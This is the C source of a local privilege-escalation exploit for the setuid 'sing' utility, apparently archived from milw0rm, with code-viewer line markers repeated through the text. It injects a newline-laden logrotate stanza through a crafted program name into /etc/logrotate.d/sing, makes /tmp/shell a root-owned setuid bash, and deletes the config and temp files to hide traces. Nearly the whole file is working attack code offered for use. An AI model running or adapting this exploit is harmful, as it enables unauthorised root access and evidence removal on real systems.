58 lines
No EOL
1.5 KiB
C
58 lines
No EOL
1.5 KiB
C
/*
|
|
sing file append exploit
|
|
by bannedit
|
|
|
|
12/05/2007
|
|
|
|
The original reporter of this issue included an example session which
|
|
added an account to the machine.
|
|
|
|
The method for this exploit is slightly different and much more
|
|
quiet. Although it relies upon logrotate for help.
|
|
|
|
This could easily be modified to work with cron daemons which
|
|
are not too strict about the cron file format. However,
|
|
when I tested vixie cron it appears that there are
|
|
better checks for file format compilance these days.
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
|
|
#define SING_PATH "/usr/bin/sing"
|
|
|
|
char *file = "/etc/logrotate.d/sing";
|
|
char *evilname = "\n/tmp/sing {\n daily\n size=0\n firstaction\n chown root /tmp/shell; chmod 4755 /tmp/shell; rm -f /etc/logrotate.d/sing; rm -f /tmp/sing*\n endscript\n}\n\n\n";
|
|
|
|
|
|
|
|
int main()
|
|
{
|
|
FILE *fp;
|
|
int pid;
|
|
|
|
puts("sing file append exploit");
|
|
puts("------------------------");
|
|
puts("by bannedit");
|
|
|
|
if(fp = fopen("/tmp/shell", "w+"))
|
|
{
|
|
fputs("#!/bin/bash\n", fp);
|
|
fputs("/bin/bash -p", fp);
|
|
fclose(fp);
|
|
system("touch /tmp/sing; echo garbage >> /tmp/sing");
|
|
}
|
|
else
|
|
{
|
|
puts("error making shell file");
|
|
exit(-1);
|
|
}
|
|
|
|
sleep(5);
|
|
printf("done sleeping...\n");
|
|
execl(SING_PATH, evilname, "-Q", "-c", "1", "-L", file, "localhost", 0);
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2007-12-06]
|